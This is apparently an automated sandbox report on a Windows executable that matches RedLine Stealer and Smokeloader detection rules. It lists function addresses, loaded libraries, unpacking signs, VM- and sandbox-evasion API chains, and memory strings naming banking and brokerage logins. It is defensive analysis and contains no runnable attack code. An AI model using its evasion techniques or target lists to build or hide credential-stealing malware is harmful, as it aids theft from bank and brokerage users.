Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0042FD35	0_2_0042FD35
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0042AD82	0_2_0042AD82
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0042D658	0_2_0042D658
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00430E6C	0_2_00430E6C
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00438E28	0_2_00438E28
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0042CFBA	0_2_0042CFBA
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041204D	0_2_0041204D
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00441057	0_2_00441057
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00415070	0_2_00415070
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00448800	0_2_00448800
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0043D8D0	0_2_0043D8D0
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041E083	0_2_0041E083
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0044915B	0_2_0044915B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0045D15A	0_2_0045D15A
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041316D	0_2_0041316D
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040112C	0_2_0040112C
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004279E0	0_2_004279E0
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041D1E9	0_2_0041D1E9
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004109FC	0_2_004109FC
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040D994	0_2_0040D994
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0044F244	0_2_0044F244
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041AA49	0_2_0041AA49
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041B251	0_2_0041B251
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00429A5B	0_2_00429A5B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00410218	0_2_00410218
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00410A33	0_2_00410A33
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00414A83	0_2_00414A83
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0044234A	0_2_0044234A
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0040136E	0_2_0040136E
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00457B30	0_2_00457B30
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00428334	0_2_00428334
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041EBEB	0_2_0041EBEB
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00415C7E	0_2_00415C7E
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00418413	0_2_00418413
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0043A4FE	0_2_0043A4FE
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00424C8D	0_2_00424C8D
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0043BCA4	0_2_0043BCA4
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00439535	0_2_00439535
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041764A	0_2_0041764A
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0043D600	0_2_0043D600
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004126B9	0_2_004126B9
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00429730	0_2_00429730
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00434FAC	0_2_00434FAC
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008B908F	0_2_008B908F
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008AD8BF	0_2_008AD8BF
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008978B1	0_2_008978B1
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008B10D3	0_2_008B10D3
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008BD867	0_2_008BD867
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A9997	0_2_008A9997
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00892920	0_2_00892920
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0088BA83	0_2_0088BA83
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008C12BE	0_2_008C12BE
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008922B4	0_2_008922B4
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A9ADA	0_2_008A9ADA
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008952D7	0_2_008952D7
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089E2EA	0_2_0089E2EA
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008B42E7	0_2_008B42E7
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008B5213	0_2_008B5213
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008AD221	0_2_008AD221
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008C8A67	0_2_008C8A67
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0088AB8F	0_2_0088AB8F
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0088B390	0_2_0088B390
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0088E3B5	0_2_0088E3B5
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008DD3C1	0_2_008DD3C1
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008C93C2	0_2_008C93C2
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008933D4	0_2_008933D4
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0088DBFB	0_2_0088DBFB
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008B03F5	0_2_008B03F5
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008BDB37	0_2_008BDB37
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008AC341	0_2_008AC341
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008B048F	0_2_008B048F
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008CF4AB	0_2_008CF4AB
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089B4B8	0_2_0089B4B8
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089ACB0	0_2_0089ACB0
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A9CC2	0_2_008A9CC2
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008AF4DF	0_2_008AF4DF
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089C4D7	0_2_0089C4D7
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00886C08	0_2_00886C08
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089FC0B	0_2_0089FC0B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008ABC2C	0_2_008ABC2C
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A7C47	0_2_008A7C47
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089D450	0_2_0089D450
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089047F	0_2_0089047F
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00886472	0_2_00886472
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A859B	0_2_008A859B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008C25B1	0_2_008C25B1
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008BB5C9	0_2_008BB5C9
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008AA5D4	0_2_008AA5D4
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00885D11	0_2_00885D11
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00885540	0_2_00885540
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008B6D43	0_2_008B6D43
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008826DD	0_2_008826DD
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A9EE2	0_2_008A9EE2
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00895EE5	0_2_00895EE5
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A4EF4	0_2_008A4EF4
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089EE52	0_2_0089EE52
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089867A	0_2_0089867A
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008B979C	0_2_008B979C
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008AAFE9	0_2_008AAFE9
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008BBF0B	0_2_008BBF0B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008BA765	0_2_008BA765

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Process token adjusted: Load Driver

Jump to behavior

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: String function: 00438E28 appears 39 times
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: String function: 0088A905 appears 38 times
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: String function: 0043D070 appears 51 times
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: String function: 0088E3B5 appears 36 times
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: String function: 0040E14E appears 52 times
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: String function: 004360E1 appears 144 times
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: String function: 008BD2D7 appears 50 times

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 1656

Source: OlZzqwjrwO.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@0/1

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_0097A27E CreateToolhelp32Snapshot,Module32First,

0_2_0097A27E

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7712

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\ce8d1ec1-1c36-4cc9-ac49-15346afedbc4

Jump to behavior

Source: OlZzqwjrwO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000305D000.00000004.00000020.00020000.00000000.sdmp, OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002A73000.00000004.00000020.00020000.00000000.sdmp, OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002A65000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: OlZzqwjrwO.exe

ReversingLabs: Detection: 89%

Source: unknown	Process created: C:\Users\user\Desktop\OlZzqwjrwO.exe "C:\Users\user\Desktop\OlZzqwjrwO.exe"
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 1656

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: my-global-render.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Unpacked PE file: 0.2.OlZzqwjrwO.exe.400000.0.unpack .text:ER;.data:W;.relo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Unpacked PE file: 0.2.OlZzqwjrwO.exe.400000.0.unpack

Source: OlZzqwjrwO.exe

Static PE information: section name: .relo

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00464074 push B000468Ch; retn 0044h	0_2_00464079
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00463CAD push esi; ret	0_2_00463CB6
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00403D6C push eax; mov dword ptr [esp], 00000000h	0_2_00403D71
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00452768 push ecx; ret	0_2_0045277B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008D29CF push ecx; ret	0_2_008D29E2
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00883FD3 push eax; mov dword ptr [esp], 00000000h	0_2_00883FD8

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00401FF9 Sleep,ExitProcess,	0_2_00401FF9
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00401FF9 Sleep,ExitProcess,	0_2_00401FF9
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00882260 Sleep,ExitProcess,	0_2_00882260

Found evasive API chain (may stop execution after checking computer name)

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess

graph_0-73731

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep			graph_0-73669
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-73681

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_00429EF7 rdtsc

0_2_00429EF7

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,

0_2_0041F9A4

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-73841

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_0-73782
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess	graph_0-73775
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Evasive API call chain: RegQueryValue,DecisionNodes,Sleep	graph_0-73775
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_0-73782

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00451F08 FindFirstFileExW,	0_2_00451F08
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00451FBC
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008D216F FindFirstFileExW,	0_2_008D216F
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008D2223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_008D2223

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: OlZzqwjrwO.exe, 00000000.00000002.3107144031.00000000009FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002A9F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: OlZzqwjrwO.exe, 00000000.00000003.1890252902.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696497155p
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
